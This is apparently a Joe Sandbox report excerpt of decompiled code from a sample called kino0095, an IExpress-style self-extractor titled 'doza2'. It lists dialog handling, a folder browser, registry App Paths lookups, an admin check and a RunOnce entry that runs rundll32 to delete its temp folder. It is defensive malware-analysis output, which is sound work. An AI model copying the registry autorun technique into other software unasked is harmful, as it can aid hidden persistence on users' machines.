CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00302DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00302DBD
CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00302E0A

Part of subcall function 003044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
Part of subcall function 003044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554

Strings

doza2, xrefs: 00302D04, 00302DD9, 00302DF0
VERCHECK, xrefs: 00302E54
EXTRACTOPT, xrefs: 00302D4D
INSTANCECHECK, xrefs: 00302D95
TITLE, xrefs: 00302D09

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
API String ID: 1002816675-859929227
Opcode ID: be09919c46a33d4a8556b793c0cfcfd95cedf2842ffed3cbd0249c5d8cc65b2c
Instruction ID: d3c1e59d63667b6860c241067a025f70bafc461dc771993b1fc0d90561168a41
Opcode Fuzzy Hash: be09919c46a33d4a8556b793c0cfcfd95cedf2842ffed3cbd0249c5d8cc65b2c
Instruction Fuzzy Hash: 9451D370783305ABE727AB24DC7EB7B269CEB45740F01442BFA81D95E2DAB48C41C765

Uniqueness

Uniqueness Score: -1.00%

Function 003034F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E003034F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x3091d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x308584 = _t35;
					E003043D0(_t35, GetDesktopWindow());
					__eflags =  *0x308184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E00304FE0, 0, 0, 0x308798);
					 *0x30879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E003044B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x30858c);
					_t38 =  *0x308584; // 0x0
					_t25 = E003044B9(_t38, 0x4b2, 0x301140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x3091d8 = 1;
						SetEvent( *0x30858c);
						_t39 =  *0x30879c; // 0x0
						E00303680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x30858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x30879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x003034fb
0x003034fe
0x00303665
0x00303666
0x00303666
0x00303668
0x0030366e
0x0030366e
0x00303671
0x00303671
0x00303677
0x00000000
0x00303677
0x00303504
0x00303506
0x00303507
0x0030350c
0x0030365b
0x0030365f
0x00000000
0x00000000
0x00000000
0x00303661
0x00303512
0x00303515
0x003035be
0x003035c1
0x003035d1
0x003035d8
0x003035de
0x003035f8
0x00303617
0x00303617
0x00303623
0x00303637
0x0030363d
0x00303642
0x00303644
0x00000000
0x00303646
0x00303652
0x00303657
0x00303658
0x00000000
0x00303658
0x00303644
0x0030351b
0x0030351d
0x0030354f
0x00303553
0x00000000
0x00000000
0x0030355f
0x00303565
0x0030357c
0x00303581
0x00303584
0x0030359b
0x003035a1
0x003035a7
0x003035ad
0x003035b3
0x003035b8
0x00000000
0x003035b8
0x00303586
0x00303588
0x00000000
0x00000000
0x00303590
0x00000000
0x00303590
0x00303524
0x00303535
0x00303541
0x00000000
0x00303549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00303535
EndDialog.USER32(?,?), ref: 00303541
ResetEvent.KERNEL32 ref: 0030355F
SetEvent.KERNEL32(00301140,00000000,00000020,00000004), ref: 00303590
GetDesktopWindow.USER32 ref: 003035C7
GetDlgItem.USER32(?,0000083B), ref: 003035F1
SendMessageA.USER32(00000000), ref: 003035F8
GetDlgItem.USER32(?,0000083B), ref: 00303610
SendMessageA.USER32(00000000), ref: 00303617
SetWindowTextA.USER32(?,doza2), ref: 00303623
CreateThread.KERNEL32 ref: 00303637
EndDialog.USER32(?,00000000), ref: 00303671

Strings

doza2, xrefs: 0030361D

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: doza2
API String ID: 2406144884-612509477
Opcode ID: 667089bf476e2771a4794b3de33239724e0bb145c006516fa0f9982bdddd461a
Instruction ID: a0b8ccad399643e09289416c6a1ca24d0cb416a3730ed60e04c678bfb7d8fc52
Opcode Fuzzy Hash: 667089bf476e2771a4794b3de33239724e0bb145c006516fa0f9982bdddd461a
Instruction Fuzzy Hash: 0A319D70243305BBD7275F25BCBDE2B3A6CE78AB01F10492BF642952F1CA728A00DA55

Uniqueness

Uniqueness Score: -1.00%

Function 00304224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00304224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E003044B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x3088c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x3087a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x308598;
					_v36 = 1;
					_v32 = E00304200;
					_v28 = 0x3088c0;
					 *0x30a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x30a288(_t32, 0x3088c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x3088c0 != 0) {
							E00301680(0x3087a0, 0x104, 0x3088c0);
						}
						 *0x30a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x3087a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x3088c0);
					_t61 = 0x3088c0;
					_t4 =  &(_t61[1]); // 0x3088c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x3088c0; // 0x611181
					_t44 = CharPrevA(0x3088c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x3088c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00304234
0x0030423c
0x00304240
0x003043b2
0x003043b7
0x003043c0
0x00000000
0x003043c5
0x0030424c
0x00304252
0x00304257
0x003043a4
0x003043a5
0x003043ab
0x00000000
0x003043ab
0x00304263
0x00304269
0x0030426e
0x00000000
0x00000000
0x0030427a
0x00304280
0x00304285
0x00000000
0x00000000
0x0030428d
0x00304293
0x003042e6
0x003042e9
0x003042ef
0x003042f4
0x003042f7
0x00304300
0x00304307
0x0030430e
0x00304315
0x0030431c
0x00304322
0x00304326
0x0030432d
0x0030432d
0x0030432f
0x00304334
0x00304343
0x00304349
0x0030434d
0x00304354
0x00304354
0x0030435d
0x0030436e
0x0030436e
0x0030437d
0x00304383
0x00304387
0x0030438e
0x0030438e
0x00304387
0x00304391
0x00304399
0x00000000
0x00304295
0x0030429f
0x003042a5
0x003042aa
0x003042aa
0x003042ad
0x003042ad
0x003042af
0x003042b0
0x003042b6
0x003042c2
0x003042c8
0x003042ce
0x003042e4
0x003042e4
0x00000000
0x003042ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00304236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0030424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00304263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0030427A
GetTempPathA.KERNEL32(00000104,003088C0,?,00000001), ref: 0030429F
CharPrevA.USER32(003088C0,00611181,?,00000001), ref: 003042C2
CharPrevA.USER32(003088C0,00000000,?,00000001), ref: 003042D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00304391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003043A5

Strings

SHGetPathFromIDList, xrefs: 00304274
SHELL32.DLL, xrefs: 0030422F
SHBrowseForFolder, xrefs: 00304246

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: a4067d58c408d199327d7ea9b1b4cf728c6f02f9ad002c94e6120394ea73393e
Instruction ID: 041ba371bcfb4aac9d5646cb2f587d609d9b3bb6919f5cfbed3089fca1845a29
Opcode Fuzzy Hash: a4067d58c408d199327d7ea9b1b4cf728c6f02f9ad002c94e6120394ea73393e
Instruction Fuzzy Hash: D3412AB8A03704AFD7139F60ECB4AAE7BBCEB45344F4545AAEA81632D1CB758D01C761

Uniqueness

Uniqueness Score: -1.00%

Function 00302773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00302773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x308004; // 0xcd371c79
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00301781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0030658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0030658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x301140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00301680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00306CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00302773
0x0030277e
0x00302785
0x0030278a
0x0030278d
0x00302790
0x00302792
0x00302798
0x0030279d
0x003028b2
0x00000000
0x003027a3
0x003027a3
0x003027af
0x003027c2
0x003027c8
0x003027cd
0x003027d5
0x003028b7
0x003028b9
0x00000000
0x003027db
0x003027dd
0x003028aa
0x00000000
0x003027e3
0x003027e3
0x003027ec
0x003027f8
0x00302803
0x0030280b
0x00302831
0x003028c3
0x003028c9
0x003028cd
0x00302837
0x0030285a
0x0030285c
0x00302865
0x00302892
0x00302895
0x00000000
0x00000000
0x00302867
0x00302878
0x0030288c
0x00000000
0x0030287a
0x00302880
0x00302885
0x00302897
0x00302899
0x00302899
0x00302878
0x00302865
0x003028a0
0x003028bf
0x003028c1
0x00000000
0x00000000
0x003028c1
0x00302831
0x003027dd
0x003027d5
0x003028e5

APIs

CharUpperA.USER32(CD371C79,00000000,00000000,00000000), ref: 003027A8
CharNextA.USER32(0000054D), ref: 003027B5
CharNextA.USER32(00000000), ref: 003027BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00302829
RegQueryValueExA.ADVAPI32(?,00301140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00302852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00302870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003028A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003028AA
GetSystemDirectoryA.KERNEL32 ref: 003028B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003027E4

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 8e8d9013c772ebded31564ddb6b65c2db351d3ed36b27825d6dbfe9e096c45f7
Instruction ID: 6eac81de5b250b9b38e4c2a32768b0fbc869664e4e9402fc90a2601924a34272
Opcode Fuzzy Hash: 8e8d9013c772ebded31564ddb6b65c2db351d3ed36b27825d6dbfe9e096c45f7
Instruction Fuzzy Hash: 1441D67590212CAFDB269B649C69AEB77BCEF15700F0480A6F545D2180CB708E858FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00302267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00302267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x308004; // 0xcd371c79
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x308530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0030658A( &_v268, 0x104, 0x301140);
							}
							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
							E0030171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00306CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00302272
0x00302277
0x00302279
0x00302283
0x00302289
0x003022ab
0x003022b1
0x003022c4
0x003022e0
0x003022e6
0x003022f5
0x0030230d
0x0030231c
0x0030231c
0x00302321
0x0030233a
0x00302342
0x00302348
0x0030234b
0x0030234c
0x0030234c
0x0030234e
0x0030234f
0x0030236e
0x0030236e
0x0030237a
0x00302380
0x00302380
0x00302381
0x00302381
0x0030238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003022A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 003022D8
memset.MSVCRT ref: 003022F5
GetSystemDirectoryA.KERNEL32 ref: 00302305
RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0030236E
RegCloseKey.ADVAPI32(?), ref: 0030237A

Strings

wextract_cleanup1, xrefs: 0030227C, 003022CD, 00302363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00302299
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00302321
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0030232D

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
API String ID: 3027380567-2601155950
Opcode ID: f41d73c953c43c0e48a08e13f10d4d6e832ab1d300b2d1fd80dcf56b3b490ce2
Instruction ID: 885c886fce340bfa66193a5b6518dc1c1244f28eff659bdc1a2d01622d540d7b
Opcode Fuzzy Hash: f41d73c953c43c0e48a08e13f10d4d6e832ab1d300b2d1fd80dcf56b3b490ce2
Instruction Fuzzy Hash: 3E31C871A022186BDB239B54DC59FDB777CEB15700F0001E6F94DAA091DA70AB88CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00303100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00303100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x308590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x308590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E003043D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x308d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x3088b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E003030C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00303108
0x0030310b
0x003031b7
0x003031ca
0x003031d0
0x003031d0
0x003031da
0x00000000
0x003031da
0x00303111
0x00303114
0x00303136
0x00303136
0x00303138
0x0030313b
0x00303141
0x00000000
0x00303143
0x00303116
0x0030311b
0x0030314b
0x00303151
0x00303158
0x0030316a
0x00303176
0x0030317d
0x0030318b
0x0030319e
0x003031a3
0x00000000
0x003031ad
0x00303120
0x00000000
0x00000000
0x0030312a
0x00303134
0x00000000
0x00000000
0x00000000
0x00303134
0x0030312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0030313B
GetDesktopWindow.USER32 ref: 0030314B
SetDlgItemTextA.USER32(?,00000834), ref: 0030316A
SetWindowTextA.USER32(?,doza2), ref: 00303176
SetForegroundWindow.USER32(?), ref: 0030317D
GetDlgItem.USER32(?,00000834), ref: 00303185
GetWindowLongA.USER32(00000000,000000FC), ref: 00303190
SetWindowLongA.USER32(00000000,000000FC,003030C0), ref: 003031A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003031CA

Strings

doza2, xrefs: 00303170

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: doza2
API String ID: 3785188418-612509477
Opcode ID: 2dd8c8f85519fa02fc3705409467fdfe046a4eb3ff7b99448bcca4cf8a85f446
Instruction ID: 8426c337641eee3f8d8c38150d04986b85f54fb61947951e666ca5bac534beed
Opcode Fuzzy Hash: 2dd8c8f85519fa02fc3705409467fdfe046a4eb3ff7b99448bcca4cf8a85f446
Instruction Fuzzy Hash: 2011D331207711BBDB1B6F24AC2CFAA3A6CFB4E720F110622F855915E0DBB08741D786

Uniqueness

Uniqueness Score: -1.00%

Function 003018A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E003018A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x308004; // 0xcd371c79
				_v8 = _t23 ^ _t53;
				_t25 =  *0x308128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00306CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E003017EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x308128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x308128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x003018a3
0x003018a3
0x003018ab
0x003018b2
0x003018b5
0x003018be
0x003018c0
0x003018c6
0x003018c7
0x003018ca
0x003018cf
0x003019c9
0x003019d8
0x003019d8
0x003018df
0x003019b8
0x003019bd
0x003019bf
0x003019bf
0x00000000
0x003019bd
0x003018fa
0x00000000
0x00000000
0x00301912
0x003019aa
0x003019ad
0x003019b3
0x00000000
0x00301927
0x00301927
0x00301932
0x00301936
0x003019a9
0x003019a9
0x00000000
0x003019a9
0x0030194c
0x003019a2
0x003019a3
0x00000000
0x0030196e
0x00301970
0x00301999
0x0030199c
0x00000000
0x0030199c
0x00301972
0x00301972
0x00301975
0x00301984
0x00301985
0x0030198a
0x00000000
0x00000000
0x00000000
0x0030198c
0x00301991
0x00301996
0x00000000
0x00301996
0x0030194c

APIs

Part of subcall function 003017EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003018DD), ref: 0030181A
Part of subcall function 003017EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0030182C
Part of subcall function 003017EE: AllocateAndInitializeSid.ADVAPI32(003018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003018DD), ref: 00301855
